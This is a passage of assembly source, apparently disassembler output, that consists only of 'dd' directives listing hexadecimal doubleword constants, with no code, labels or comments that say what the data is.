		dd 2BD485E8h, 2180B530h, 88BD104Dh, 0B028F405h,	17E8823Dh
		dd 8247A048h, 0BF4413A4h, 0B012BBBh, 5A13D520h,	2C058491h
		dd 7E580B63h, 0EC059024h, 5F960271h, 80BF4700h,	0BF802A28h
		dd 93072855h, 1E80B00Bh, 0ACC61A40h, 9809DE10h,	612D092h
		dd 0A8CE980Ch, 0E0B0784h, 0C2E1B0F8h, 8C4E2B17h, 8CC6E3B1h
		dd 0F90C8E4Bh, 2794CAE5h, 0B2F98CCEh, 6B379CCEh, 0E7B3FA0Dh
		dd 0E8B47A4h, 0D2E9B4FAh, 8D4EAB57h, 0ACD6EBB5h, 0FB0D8ECBh
		dd 67B4DAEDh, 0B6FB8DCEh, 0EB77BCDEh, 0EFB7FC0Eh, 0F0B87C4h
		dd 0E2F1B8FCh, 8E4F2B97h, 0CCE6F3B9h, 0FD0E8F4Bh, 0A7D4EAF5h
		dd 0BAFD8ECFh, 6BB7DCEEh, 0F7BBFE0Fh, 0F8BC7E4h, 0F2F9BCFEh
		dd 8F67AF39h, 0BDF6FBBDh
		dd 0FF0F8FCBh, 0E7F4FAFDh, 0BEFF8FCFh, 0EBF7FCFEh, 0FFBFEAA6h
		dd 4AAA2A95h, 3ACAA64Ah, 0E8A006EFh, 6751D1A0h,	377B3D3Dh
		dd 5201DD15h, 0C49FE620h, 7C5203D5h, 33F3D45Eh,	0A4129D5Bh
		dd 4914B9AFh, 2A259001h, 65920A6Ah, 45809AF2h, 0A440C2h
		dd 5E81432Eh, 8C89503Ah, 85040455h, 0CD8154D8h,	15CD3423h
		dd 4EB7DD98h, 31A9EAA1h, 0F005D535h, 0E6A18552h, 8375B393h
		dd 59C4020Ah, 517B6089h, 8105BACAh, 8941B85Ch, 97BB529Bh
		dd 613363B4h, 2546B2D8h, 8D5D5D33h, 329466DCh, 5E34230h
		dd 42C42A42h, 64244224h, 1C379112h, 1020F20Dh, 20902B74h
		dd 0BA9FB216h, 113A30BEh, 15D52D0h, 9973614h, 0AAF65343h
		dd 0E8C1B552h, 0EAC14536h, 0DF6E047Ah, 9DD58221h, 100F20E2h
		dd 0C20A209h, 20822349h, 550D54A1h, 0DC80A5FAh,	80A99B7Eh
		dd 0AB4A0878h, 1BB8192Dh, 43361297h, 4171B5B7h,	0D03416C5h
		dd 0D020578Eh, 60059003h, 25B6E06Eh, 0CAF95853h, 0EC56A0C9h
		dd 314C5DADh, 0E2B72938h, 39DB15C2h, 70BD22D2h,	1A0A0525h
		dd 0E4DB7A87h, 0CC0BC5C1h, 87E080A1h, 3E63CC4Ah, 506E4121h
		dd 7993B0A3h, 8C5F8AF0h, 0C8515AE8h, 0AA5E4F59h, 5915EB02h
		dd 0AD3E8AA4h, 48110D6Ah, 3F3C759Dh, 4638B83Ch,	582DAA1Ch
		dd 84CEBF30h, 1762B631h, 162C56E1h, 79570374h, 0B49669A9h
		dd 924B0312h, 462C4FCBh, 6CC54F8Ch, 598CA1ADh, 64BC8F85h
		dd 0B5A4E552h, 0EF2C85D8h, 999F8C66h, 48189115h, 6B259879h
		dd 0AC072D06h, 1A4DD462h, 0CE6B9F65h, 4151A51h,	0E6E0F143h
		dd 8566505Eh, 53E438E1h, 70FDF009h, 6AC0895Bh, 0AE858292h
		dd 5CD56F2h, 1920620Dh,	187BAC0Bh, 1B8DEA2Bh, 80E97331h
		dd 67041642h, 60E13AB3h, 11770265h, 373AED66h, 55BE11A1h
		dd 0F6649662h, 470106A5h, 5425491Fh, 2A2D2004h,	2EB641E8h
		dd 9470E41h, 0AC2632B6h, 507959Ah, 41E51C17h, 14D87C62h
		dd 8C50FDD9h, 48CD9640h, 0D65783F2h, 0C866E6A1h, 1B8A3A87h
		dd 56885C53h, 0C1D94C05h, 514B8552h, 0E6A19C4Ch, 0E28E78ABh
		dd 4FCC938Bh, 4C6596CDh, 615D9CE5h, 0ADF1A01h, 0E6405E6Bh
		dd 0DC6165ACh, 0EB3EB31h, 0E5A68Eh, 56E0315Dh, 1CE02DF6h
		dd 66448234h, 91C13253h, 6B814ACCh, 0C18D5E5Fh,	0AC8BE008h
		dd 0C9929E12h, 149F120h, 1092818Ch, 0BC0465A9h,	4AD29525h
		dd 7C248498h, 92060348h, 46FC94Ah, 25284B00h, 84334040h
		dd 8678915h, 4A4A0232h,	0F4A5B3E9h, 5110CD11h, 320120h
		dd 153A06B2h, 0A0730105h, 0D1A45131h, 88A4B545h, 21101284h
		dd 9DEC069Eh, 92CF892h,	0DA0A2D98h, 81455F24h, 0BA5496CBh
		dd 4D9C0F2Ch, 80637271h, 0EA3C8031h, 5C00A26Dh,	340215F3h
		dd 86F340Bh, 351FC080h,	60D00C17h, 0E6F98310h, 162C8C48h
		dd 0D70340BCh, 0CB83A038h, 1F8042B5h, 0D47250FCh, 0DD58FDDh
		dd 48D4004h, 68894E12h,	9625204Ah, 28943122h, 297D3F48h
		dd 68BC884Eh, 3EC84712h, 8425E8E5h, 0FFFFB99Fh,	0A8107B01h
		dd 0C7C8023Ah, 81F001h,	0F70047Bh, 97512E8h, 25CC4B80h
		dd 96F12DC2h, 5B44B609h, 6B12D425h, 0A44B4096h,	712CC259h
		dd 44B20963h, 12C42584h, 4B0095F1h, 2BC25744h, 0AE095B12h
		dd 0B425644Ah, 0C095712Ah, 0C25544AAh, 95312A4h, 25444A70h
		dd 94B12922h, 518488A5h, 0F4FCA1E0h, 4B809681h,	2C025604h
		dd 0A8094712h, 229773F0h, 86F12CA2h, 5784AD09h,	5912AE25h
		dd 4C4A5094h, 8128A250h, 44BD1C7Fh, 0FFFB5FF7h,	141011BCh
		dd 25504A48h, 94212F27h, 0D90E0259h, 44AD0953h,	0AA8A990h
		dd 6C012C31h, 3C0AE89Eh, 44206040h, 4F045229h, 524EE69h
		dd 1850047Fh, 0A49812Ch, 5409E20h, 3F06924Fh, 38355709h
		dd 83BB9ABh, 1A25887Bh,	0FE940321h, 30D96B42h, 0D0010009h
		dd 82507BCh, 5C095DC0h,	31DCD0D1h, 0DE591DCCh, 0CCABBA89h
		dd 61ABBD4Eh, 0E8FB16B0h, 30D55604h, 2E4B91ADh,	495DBC96h
		dd 0A0B1A14Ch, 59663963h, 7585AA85h, 0BEE17526h, 0A6C2032h
		dd 38469A29h, 2A9F8508h, 0E5E0322Ah, 0B53A2D49h, 0DEF2E95Bh
		dd 0ED887535h, 0EC0857D7h, 0E2306F2Ch, 0CEF7CA1Dh, 5D284B12h
		dd 0D095E6DCh, 23314A6h, 46CD725h, 0D2BA0043h, 2BB028B5h
		dd 25A2F37h, 36B7656h, 3B0D89D2h, 36B65918h, 8260F089h
		dd 6B8DCAE8h, 0BB0E74C9h, 201DB424h, 0BB264046h, 0BB078655h
		dd 6DE797ACh, 5EB717Ah,	0F85EC517h, 0B305ED31h,	7B6A745Ch
		dd 4742F1D0h, 0D8743D00h, 62F2E896h, 65B1D1h, 6474601Dh
		dd 19C746E1h, 0D1D60052h, 0F2B98125h, 0D9F33817h, 0E80D4141h
		dd 0B4C07FC9h, 51CCD26Eh, 6A29F286h, 0A0903A38h, 4581000Eh
		dd 9AF7C23h, 0EC01C1ADh, 43A79C27h, 55AA4908h, 0CC647513h
		dd 54126440h, 86925E8Ch, 4532888Dh, 530637F3h, 23E72C02h
		dd 0F2E7BD86h, 0EE460CADh, 0EA04230Ch, 2132A849h, 6C86D80Dh
		dd 0C01098h, 13994342h,	0EA419709h, 4B4E140h, 702947A2h
		dd 0D50A9AB9h, 8C28B21h, 3930C5B0h, 732F3F4Bh, 0F378C79Ah
		dd 30868A7Fh, 0E09253AAh, 93496169h, 92841169h,	454EA05Ah
		dd 5A021349h, 4B0E3560h, 0F02BCAD0h, 98BED729h,	5C23497Dh
		dd 0A60A1919h, 20199357h, 0A0B461C5h, 49701912h, 6AE0A5A6h
		dd 0E1639230h, 621C034Bh, 296B15C8h, 605F1513h,	914F9952h
		dd 0EE116E9Ch, 62578ADh, 51F7F6EFh, 0E2038A0h, 95D318AFh
		dd 5C739311h, 0CFFA2212h, 0AE051691h, 6066853Dh, 7026082Dh
		dd 17450309h, 0D4BC90A2h, 10000B28h, 72174809h,	68315666h
		dd 1B8456F9h, 3900B00Fh, 2B94905Eh, 320203C8h, 4967CCE4h
		dd 0ED5F9D53h, 134B2759h, 4EB2F7EFh, 4F473281h,	6383CBD8h
		dd 33F6EDCh, 7014844h, 2B05C0F6h, 0AE4E2014h, 98D0D701h
		dd 0F1A9004Ch, 5D82786Bh, 97E1C704h, 4AE243A1h,	0BFC67790h
		dd 0EF41D1A4h, 0A0A75289h, 0DEA722D6h, 9E359E34h, 0C6130C45h
		dd 671E610Ch, 349F0687h, 0A9661059h, 83038DB8h,	0E0109156h
		dd 36097B87h, 41BB1041h, 60C4228Ah, 1B608156h, 7985100h
		dd 8C195611h, 2DC88690h, 38009599h, 16244022h, 0B5452D91h
		dd 4B7452E1h, 89180C6Eh, 534B040Eh, 390F8043h, 629C513Ah
		dd 0CD3864DFh, 62614A46h, 0E7F56093h, 0BBBD5468h, 6E42FDA6h
		dd 0C08BD5BCh, 4F80227Fh, 703804Dh, 0C6FB361Ch,	0E0E0C492h
		dd 0F65A29D8h, 7CA93F76h, 0A9E929A8h, 0CA7C38AAh, 8F701178h
		dd 0FB82C7A2h, 0A848298Eh, 74821F7Fh, 0A9F75AE8h, 0EB220B9Ch
		dd 40200084h, 5553A107h, 7034F878h, 0C92A81D7h,	9B06703Eh
		dd 73AD081Bh, 674008BDh, 56CF622Ch, 109DE3EAh, 2207E04h
		dd 2A4C5E8Bh, 9929EEE2h, 0E30115CAh, 85A80436h,	5D698A84h
		dd 88042F40h, 20313D6Dh, 78F0FD0Eh, 879A9201h, 7F8E36B4h
		dd 423C5DEDh, 407518EEh, 1015454h, 7894CC6Eh, 2E96D4C1h
		dd 98EB6906h, 70E8EE0h,	22F03EAAh, 0D58DD9EAh, 0C3079F0Fh
		dd 68082AC0h, 80081337h, 0DCC41DC4h, 5BA410FBh,	0F838197h
		dd 72E30129h, 4580191Bh, 0D50250C2h, 0A24228C8h, 2C7A1512h
		dd 9EB59F21h, 0E368C80Ch, 7A40DBB5h, 56F0C561h,	0F3A7B982h
		dd 11651E0Bh, 81283A7Dh, 7AF5B894h, 413AD5A2h, 27731052h
		dd 0D9834B9Bh, 0D4EF5B64h, 67A2B880h, 9E6D6228h, 0F0C64250h
		dd 741594C7h, 17204202h, 2EF49441h, 14B6BB98h, 21199460h
		dd 0CC5B899Fh, 68B9D07Ah
		dd 52D38C84h, 9F131646h, 58A3C5BFh, 38109821h, 18611C34h
		dd 0E0E0B101h, 1B249C0Eh, 679422BEh, 3D802413h,	0DDE554E6h
		dd 59600BC9h, 83B00C78h, 0CC3455D3h, 0C4A40069h, 0D3746C46h
		dd 6D4E554Dh, 3B87C448h, 7A5F85A6h, 833A0FADh, 0E1759FE1h
		dd 4961147Dh, 0BD6F22A1h, 58539893h, 0F9C02849h, 1C50D858h
		dd 0C39ACD94h, 0AC51C25h, 2C25AD1Eh, 311D860h, 0C97C2539h
		dd 15B5A078h, 6883A14Fh, 29A5EE62h, 4AECF0B8h, 130389ABh
		dd 89A174FBh, 2CB2A078h, 0AA9683E7h, 7009A549h,	0A96F09A7h
		dd 9BF95D2Ah, 1A3140Ch,	44FC1078h, 0CF4DC391h, 0C8C52FCDh
		dd 8A99183h, 0A589AE02h, 18BB85CAh, 69E198C9h, 0D0D4299Fh
		dd 9C74DB99h, 0A8630CABh, 6AA762E5h, 0AA9B8F27h, 1FD9B91Fh
		dd 4BA68230h, 0AA673F85h, 869BF3E2h, 2E246135h,	0AF115DBCh
		dd 31981DCAh, 5E979227h, 0F9227060h, 0F4023565h, 454B4012h
		dd 5CDA6D33h, 2DE606E3h, 6F25454Ah, 88984414h, 0F89CF418h
		dd 4B1850ECh, 0E91CDEE6h, 28715B36h, 0E9082C35h, 2717BC1Fh
		dd 0CF395BE1h, 844B8F90h, 671C71B0h, 80470D2Ch,	44B192C7h
		dd 4B212CA4h, 0B2D2CD4Bh, 412D14B4h, 92D44B59h,	2D74B612h
		dd 0D94AC92Bh, 34AD12B6h, 4ADD2B84h, 0AE52D3CFh, 0C6D450C1h
		dd 0B372542Fh, 0E81D1B5h, 0E3B59432h, 3D5AF850h, 0D6D65954h
		dd 0F37F23F3h, 10CF393Fh, 45111B91h, 560B325Ch,	38455152h
		dd 5ED05E2Dh, 5DE3EA16h, 8045D5DEh, 5410FC1Dh, 0B118A34h
		dd 1B92EAA8h, 91099281h, 1879F93h, 37BFE9EFh, 60E57DADh
		dd 7106603Ah, 14C50F02h, 0AC492D1Fh, 4956A870h,	1CA8D615h
		dd 7435A76Bh, 0B3585976h, 0AF615997h, 30E4C708h, 1AD2851Fh
		dd 8090BC8Bh, 0C1B5745Ah, 16BAE020h, 280B270Dh,	0B9101E08h
		dd 0BA5D0A5Eh, 100BE764h, 0D01F155h, 2AE72E0Eh,	0F512E4ADh
		dd 518CE986h, 2A96F090h, 6B2E6181h, 0C5B62F78h,	144BADD0h
		dd 35A8C13Ah, 0D18A30B0h, 1B20AD3Ah, 6C1C6C05h,	4AAD4A98h
		dd 0C28B291Bh, 5269CBCDh, 62CBAA3Ah, 7C7F5514h,	0C12A0BDDh
		dd 38449D89h, 84073259h, 7CDA5AA8h, 0E4D52E01h,	6BF46DDh
		dd 81EEE6CBh, 9F6625F8h, 0AA164689h, 37B8F3FFh,	7C0DAE97h
		dd 0B653D339h, 0AB6328DFh, 18893ACEh, 93053FC9h, 756BD1CDh
		dd 5E635507h, 0EC406B78h, 3896FB0Bh, 319270EFh,	0B0CAADD2h
		dd 0BA6EE5FEh, 0D8F7B01Ah, 78377336h, 77E25382h, 4AD257C9h
		dd 86A3EFBDh, 0FC6CE9B8h, 7F33430Ch, 925BE59Eh,	9BA6109Dh
		dd 6E95DCD4h, 0EC2B9DACh, 47E6ED52h, 0A8CFB316h, 0DE34C751h
		dd 0C893C0F6h, 1C7BFD67h, 7FF385F8h, 0FD1F23Ah,	7EAD46C7h
		dd 0CA8359E5h, 24A29858h, 56DE4F38h, 90C6E5DFh,	0CB6CB29Bh
		dd 13869BA9h, 0D52E70ABh, 2EECA5AAh, 0ED2EE4F0h, 0B0385965h
		dd 0CB25A1F4h, 59A976D9h, 0E46B5170h, 0C598E168h, 0EA36CE3Ch
		dd 67D10692h, 6723F99Eh, 0B6166B0Eh, 0FA5C3416h, 0A8845B83h
		dd 0A48CC22Dh, 9378F532h, 0EF4893EDh, 779B09A6h, 0CE191C9Ch
		dd 0D2B55D8Ah, 753F959Ch, 0ADFCEDF2h, 0EB47BB05h, 8F5920B1h
		dd 0E96F1142h, 7C8C2422h, 5C7C67Eh, 0BFFBEC87h,	0AED950D2h
		dd 7DF47F93h, 5F2BC5C7h, 8D67F342h, 6D585D71h, 7DDDCBE7h
		dd 6E9E4EBEh, 0B4FD2DFEh, 0A50EA8E3h, 2D105CDEh, 0AFB3838Fh
		dd 0C679BE0Ah, 0DC8B5D28h, 0EBA84887h, 2CBEF91Ah, 85087277h
		dd 4DF62858h, 9BCEDE27h, 2A1827Ch, 0E9180A9Dh, 6F85569Ch
		dd 0C67A105Dh, 0B287099Bh, 0A79BD7A8h, 78918C0Dh, 0B7B4A202h
		dd 50A0503Dh, 1A8889BEh, 0B7DC28AAh, 24263365h,	0E4A72898h
		dd 9E2DA7FFh, 0AAA2825Bh, 0F137BF92h, 8A89B1CBh, 45A76A2Ch
		dd 24D625C7h, 92A8B899h, 4935A79Eh, 0A30274A9h,	45B3CA32h
		dd 278E4B4Fh, 9C28D09Bh, 5EAE3316h, 0A3625973h,	9ACBBA8Eh
		dd 975814Ah, 0EB2A3A5Ah, 6158E7DBh, 0B54A3C94h,	0AEA7EE83h
		dd 0BD51F136h, 0B5388E0Dh, 4804D5F7h, 0ECDEE521h, 122132DAh
		dd 4B548849h, 0FC87F675h, 48C4F243h, 0BDFBE524h, 13858FD4h
		dd 4F549441h, 0D48564D4h, 984B7E0Ah, 67949C4h, 0B85BA1D0h
		dd 0A52813F9h, 2FE95194h, 0A4493724h, 9D714A84h, 0F6CAB895h
		dd 0A52B13BFh, 0B3CAE754h, 0B04EF58Fh, 5F8B52D1h, 351B2BBCh
		dd 0F14B84F3h, 6BBDB475h, 2F127735h, 0C14514C0h, 4B240FE3h
		dd 4C531098h, 406DE468h, 5BCA5D99h, 4C832397h, 0FC7414CCh
		dd 4986FAA9h, 6534123h,	152F7F59h, 4D435310h, 0CEFCECB5h
		dd 5924194Dh, 825520B8h, 0D5D4DC4Dh, 0C7477732h, 5381391Dh
		dd 0E91C539h, 12A7ABA0h, 0D454E84Ch, 0CFAF1DDFh, 53B13505h
		dd 337E153Ch, 12C75AE4h, 0F154F44Eh, 5E2A83E3h,	53E12E65h
		dd 0EC77753Fh, 1347B8D9h, 7596004Fh, 0E18F7D75h, 6044B04Bh
		dd 0E2F43582h, 12E5ABF8h, 68560C4Fh, 64E6C91Ah,	58412511h
		dd 0EB1C8D61h, 44F4FAFBh, 0D4FD0AC3h, 1456F3C6h, 0D92C3892h
		dd 0BA9DCBC6h, 0B102672Ch, 326F573Ah, 7D27E541h, 0F85C090Fh
		dd 1F7186E8h, 0C7BD7E0Eh, 6F5AFBDAh, 0F55E0DDBh, 0BDD7FA79h
		dd 0AFAEEADFh, 17B96AACh, 0FF083699h, 456345C5h, 0BED8E15Ah
		dd 0E8687841h, 0ECFE231h, 0BA3C7227h, 3585DC4Ch, 612FA7E4h
		dd 7F5BBF6Eh, 51939271h, 0E817BD5Fh, 2A65BCDFh,	7262B0A2h
		dd 0B9E9E532h, 1B10CE71h, 2CF1DA1Eh, 0DA853EE5h, 0EFBA9C5Ah
		dd 64AAFD65h, 0FE67252Ah, 489ECFD7h, 5A75ABB7h,	0F2EBF17Ah
		dd 0C51E958Ch, 8CD12D9Dh, 8CF41783h, 5DCEEEF9h,	707EADF2h
		dd 6D2A94E6h, 0AC517EEDh, 0C2615A80h, 0D6723392h, 90EFBF63h
		dd 0D92F8ACCh, 617C0FFDh, 9E4D3329h, 113758B4h,	61E95B4Ch
		dd 769F1FF9h, 0B24365D0h, 0CEDE929Fh, 0FADF4769h, 1B5A3916h
		dd 157F7A1h, 1C9DE7CDh,	50929DE9h, 0F9584542h, 8A57F8CAh
		dd 7F950B2Fh, 8CDA3B5Fh, 5430BA38h, 2F36B550h, 0D28FDB27h
		dd 0D2B5438Ah, 0D7BDA0FEh, 0D50F2BCCh, 86FD1354h, 40968057h
		dd 0FF88000Eh, 819FCBB4h, 70E8C88Eh, 0DC8B2EE5h, 0F3B7273h
		dd 0B70F9B8Bh, 0B8F43183h, 0FCCD1AE8h, 0DC0A95A4h, 9DA7B281h
		dd 0A11C0147h, 4DC17C30h, 4030D27Eh, 1D30B2D0h,	0D5CE34A0h
		dd 0E2F050AFh, 0C9030465h, 6B206020h, 0F94B00h,	9BA07F2h
		dd 202410CCh, 105031BAh, 2984830h, 44453466h, 0E62C976h
		dd 17984318h, 694004B3h, 7522C648h, 4A14E052h, 750C1EBBh
		dd 22C09832h, 55A0A35Eh, 0CE12E9E0h, 0DEADB82Bh, 86C722BBh
		dd 218AEC84h, 2E8A67B7h, 17776E8Eh, 0BE2E96A6h,	0CEAE4E7Eh
		dd 86665E56h, 463E3626h, 9E0ED6C6h, 1EB61676h, 68F16D8Dh
		dd 98047E30h, 42DA003Ch, 4360532h, 6DAD3D58h, 7260B455h
		dd 9D14020Dh, 0D55B815Bh, 4C04327Ch, 8D612ED1h,	0D2D01CBFh
		dd 1584747Dh, 796FD6B8h, 0EC8D425Ah, 15F635C4h,	0E82D6C00h
		dd 43382A0Ah, 0E4BE4CCFh, 0F1ACBEC9h, 561F7810h, 80656E60h
		dd 0A7397E8h, 7E271850h, 24AB97EDh, 74FE5CA1h, 0D04C5171h
		dd 0B7003D42h, 0C34CDE8h, 0CF0CCE88h, 0C108CF0Ch, 0BB3D057Bh
		dd 0FAD9ADD4h, 0F30442Ah, 0AF3A1E7Ch, 0CA35015Ch, 0EB6C2876h
		dd 0A33ABF06h, 0A5F943EAh, 0E634DE6Ah, 218CD516h, 6063E458h
		dd 1319F86Dh, 4BE1CE05h, 0E2080913h, 0AC3C18BDh, 405DA507h
		dd 54432CC4h, 83F27531h, 105D23Ch, 3D220B02h, 805169B3h
		dd 2FB300AEh, 4E807E5Ah, 0CE3F0130h, 0C40C4A60h, 556D46AEh
		dd 5D149225h, 0A62D2014h
		dd 396300Ah, 97589DE9h,	3423775Ah, 732A565Bh, 388ABAF5h
		dd 0E8EF5D06h, 9FE3CC73h, 41FEA8D5h, 69354718h,	22B59A79h
		dd 0B2B4B3B4h, 0C2545A20h, 9E150489h, 0E342CC38h, 0EC525A4Ah
		dd 0AB503B41h, 0AA0202FFh, 4E33A868h, 5D9564D2h, 83757543h
		dd 70611D52h, 439563F6h, 973BD01Bh, 55A93532h, 332A5CCCh
		dd 8D615E31h, 800405h, 417EAh, 5A9D5402h, 19ABC510h, 2A56E9F5h
		dd 31346C05h, 8DA73954h, 0CAE0FC24h, 51D7380h, 17457144h
		dd 2D29AEA8h, 199319CCh, 0C965526Dh, 382B2A00h,	80309800h
		dd 0F0128029h, 0D418358Dh, 0CD5863A6h, 0CC19D379h, 934F201Dh
		dd 0AA687F3Eh, 0D98F3A8Fh, 32BB5B74h, 3E030D12h, 0EE1AB0A2h
		dd 0ECE5E330h, 0C68BE380h, 696726Eh, 0E6120415h, 0CEECB204h
		dd 0A70807E3h, 5AEB8FB1h, 861C4A7Bh, 0AE4C9545h, 769A457Ch
		dd 40560727h, 7C95E61Ch, 0D28619B7h, 42954B79h,	23F6842Eh
		dd 0C153B7h, 584BDCCEh,	3AD70CC5h, 9A322408h, 946B49B7h
		dd 70966207h, 6A73F978h, 3207D4D5h, 0D2805808h,	63F66207h
		dd 663F9883h, 66E0C640h, 7C620464h, 74A903Ch, 0B5275356h
		dd 0A31D63D4h, 624D1FEAh, 0C1A1F174h, 1097CD8Ah, 8B78A083h
		dd 1282A283h, 5A58965h,	0C5C52CB4h, 426EECB0h, 0A65A6ECh
		dd 16AEB2C3h, 30A2B3BCh, 318A9024h, 82960B04h, 9F62D65Ch
		dd 9C7FCA79h, 3B19E634h, 0D51BC063h, 4772A6B4h,	4E0D9564h
		dd 9D528B4Dh, 0AE50DD63h, 0F60642EBh, 8BA1F620h, 43545301h
		dd 0CAB68069h, 40F51448h, 5A9944A6h, 91A705C1h,	724E7E01h
		dd 36E2AE29h, 68E0C2Fh,	2FD914F2h, 0A93E7DE7h, 0D50016D0h
		dd 0EB96043Ah, 234073F1h, 25A1B331h, 5DB21176h,	0CC67A227h
		dd 9F91AF45h, 0DBE14A4Bh, 0EF583505h, 0DD15B818h, 5EC418B7h
		dd 605362DDh, 81923123h, 1C0BDC5Dh, 0E648808h, 3E71932Bh
		dd 0C88CA880h, 0E2A04CC1h, 82E3D05Ah, 0A0A1E165h, 30EE9269h
		dd 4AA7BEB5h, 70BCC8E3h, 8406E6Ch, 6A8E5D5Dh, 0C76898CCh
		dd 0B37A846Ah, 0A481546h, 284FE0F8h, 0C763886Ch, 861869h
		dd 0B225674h, 9459C5F3h, 0F4752DE5h, 98E5E1D8h,	0BD12C20Bh
		dd 12C60CA9h, 0EFDFC30h, 6B535F6Ch, 0A02F05C9h,	0FED8F951h
		dd 87A87442h, 94BB2DE5h, 6AC6F049h, 6434E96h, 50087DA9h
		dd 5212C847h, 90A9CD28h, 80233AA0h, 0DB1C7BAFh,	2EECB512h
		dd 7DAA1014h, 4F3920C6h, 0E3AD501h, 27D8DA05h, 2A71D617h
		dd 462B6237h, 8928987Eh, 5296010Eh, 1A40FEC1h, 88D9983Eh
		dd 452B743Ah, 8554096Dh, 252F0075h, 40014B25h, 36D17AAEh
		dd 82E54A82h, 6510B50Ah, 5E02C08Ah, 0BBC80972h,	6B16039Ah
		dd 4D418265h, 5EAC982Eh, 508BA896h, 9611450Bh, 36B23039h
		dd 684CB6D7h, 5A211698h, 149684BDh, 43F8A81Ah, 0AF2C8C30h
		dd 0ACBDD0D1h, 9336212h, 990A1C46h, 0CCBD7224h,	1DE7E1DEh
		dd 986536B5h, 8012B81Ah, 38591A15h, 355CA41Dh, 4E09FF09h
		dd 915529B0h, 22654AD3h, 792DB0ADh, 0B8588046h,	0C6458B27h
		dd 4A9A8AEFh, 0C52CA2B6h, 3A886D41h, 0BB2D802Bh, 0F6347D71h
		dd 0B34BC2E3h, 0E32D581Bh, 2CEC6987h, 0CD235E00h, 0CC14C120h
		dd 0F0053064h, 0C1E115CBh, 470F33E2h, 2C5ECD5Ch, 1775BF90h
		dd 0D3402C45h, 88024BEDh, 91051D05h, 0F83002A6h, 22458414h
		dd 6AA6B5AAh, 7A06AABh,	0B2E25CC0h, 32C6AAD4h, 0B0143E5h
		dd 0A70DAD90h, 0CE76B67h, 8A9745B8h, 1BC1C9D6h,	4B655EC8h
		dd 42EE9B6Ch, 634093Ah,	8A069248h, 87D1458Bh, 85294350h
		dd 43A2952h, 0AA800E78h, 1D9F0C05h, 3C8BBD71h, 8C03BA59h
		dd 280E0203h, 631357A1h, 3E061C24h, 80ABFF42h, 3D94041Dh
		dd 2008CC24h, 485F0A95h, 62868131h, 25FF0050h, 226A6463h
		dd 0C5001B81h, 83040CC4h, 89851C98h, 78FA109h, 1C2155C2h
		dd 85BF01C5h, 212AC40Ch, 45973E0Dh, 29E32475h, 429C84C2h
		dd 42C59902h, 0A2041A6h, 156A8702h, 4A02C99Fh, 31C2800Dh
		dd 68C1868Bh, 0A706963h, 10728C2h, 904134A3h, 0A5F1921Eh
		dd 0C025C490h, 0A881E750h, 107C8554h, 40F02894h, 4074E248h
		dd 53CD0251h, 49137279h, 24913263h, 8124DC8Eh, 91491279h
		dd 0DC4AC0C9h, 8F5C12D8h, 23DC06E8h, 7E531341h,	0B2D431A7h
		dd 771A01FAh, 0C09F7E12h, 0F027DF04h, 0BF855468h, 73F0C98Bh
		dd 0DE04FA21h, 84425923h, 4F278083h, 482AC998h,	124C98A8h
		dd 0C70A0034h, 90286F0Ch, 98F62048h, 9933A488h,	0FD784FA7h
		dd 897113EEh, 0A25E047Ah, 788FDC44h, 0FAA89442h, 489E4801h
		dd 6585593h, 32A88FCCh,	70A0035Bh, 286B8C9h, 8F5B12BCh
		dd 23D6C47Eh, 0AE27D844h, 0B509F6E1h, 2E223D84h, 47ED427Dh
		dd 0A04BE89Fh, 4124A844h, 0AA39A04h, 7EFA27DBh,	84A81254h
		dd 0F2A09571h, 1EDC23F3h, 1C2800DDh, 0A1C632h, 63D9C4B5h
		dd 8F7411Fh, 0B189F791h, 2EC27DE8h, 0FA119443h,	51EF223Fh
		dd 7613E238h, 54249264h, 0F2680834h, 2AC9981h, 24C98A8Ch
		dd 70A00347h, 286E0C9h,	8F6012C6h, 23D1C47Eh, 0B827D344h
		dd 0B789F731h, 2EC23D34h, 47EDE27Dh, 504A1127h,	4F230083h
		dd 242AC999h, 5047E638h, 5001AD81h, 435464C7h, 0AC895C11h
		dd 0EB623F55h, 13B09484h, 313490A6h, 688B1802h,	128F8A16h
		dd 3E68645Fh, 80473296h, 0F12EFA50h, 4E721294h,	0AA2961D2h
		dd 0D625DE4Ah, 27CF429Ch, 960CA955h, 0C90D4EDCh, 0AD7391A5h
		dd 928A1342h, 356F9B41h, 232282E4h, 0E3219728h,	0A131A2B4h
		dd 5598327h, 81039097h,	86B0AAh, 0E4E2CD99h, 0A4A12C34h
		dd 0B0603FCCh, 21741822h, 0FF275966h, 0CF83082h, 751881EDh
		dd 4CCD3F2Fh, 1374FCEDh, 4E13F387h, 3A4FCF3Ch, 0ED3F2CB3h
		dd 0C4FC82D0h, 0D3CC023Dh, 0C9A30387h, 34A9546Ch, 7810E8CAh
		dd 9564876Fh, 0C53D3CE6h, 3103D8AAh, 9B447E76h,	0EACC41B9h
		dd 0D1AC279Dh, 84FAFD5Ah, 69C73147h, 5AA3735Dh,	5F668DCCh
		dd 0E018837h, 2F9854F3h, 0A09F5EF1h, 69E6311Eh,	0E4E3D450h
		dd 8AB206E5h, 9322A247h, 0E43F26EDh, 0E0B76F24h, 0B5C6B787h
		dd 52CD1B91h, 0CDCA677Bh, 70041E8Fh, 0F1196441h, 4585EE28h
		dd 48F38045h, 0F189ED2Eh, 0E8FB878Ah, 304238E8h, 0F0095D25h
		dd 74272812h, 49610EBh,	0C80D9432h, 65CA0546h, 90D368D4h
		dd 1F777769h, 94D021ABh, 155341F3h, 89BD060Eh, 41558637h
		dd 2BBBE070h, 0B0956203h, 1FB76082h, 892C765Ch,	6A819785h
		dd 167C089Bh, 43486251h, 0DE1B2C3Eh, 4E78884Fh,	4AB103E6h
		dd 252C6955h, 32372B5Dh, 1070B895h, 6407CAC7h, 490B6155h
		dd 823F221Dh, 45383F36h, 5DA5B23Dh, 0A0DE04FCh,	0B5F853CEh
		dd 3103D57h, 0F23206E4h, 0A7CCD81Fh, 909F6B50h,	7E503E89h
		dd 0E7213E83h, 7D96965Ah, 7BF57023h, 5BCDF666h,	87CB37F4h
		dd 1C304554h, 88DCE3C1h, 0A8247C65h, 4ABF4A28h,	0AC71F73Ah
		dd 27407E64h, 518734F3h, 2770306Bh, 2E2E1199h, 5015A712h
		dd 0E92E4F3Ch, 31063439h, 12E7E3C5h, 98F349BCh,	5A80E848h
		dd 0DAC23319h, 0D3145386h, 38A092FAh, 138A1A8Ch, 3A0A97Eh
		dd 97121CA4h, 4BD3702Ch, 0A3FCE472h, 0E89FD444h, 7B409BCDh
		dd 0B9A30424h, 5881E79h, 0F1E87C55h, 0E8CDB3B1h, 45033175h
		dd 648C0D2Fh, 84BD5660h, 0D848E60Fh, 4834116Ah,	8A5EF003h
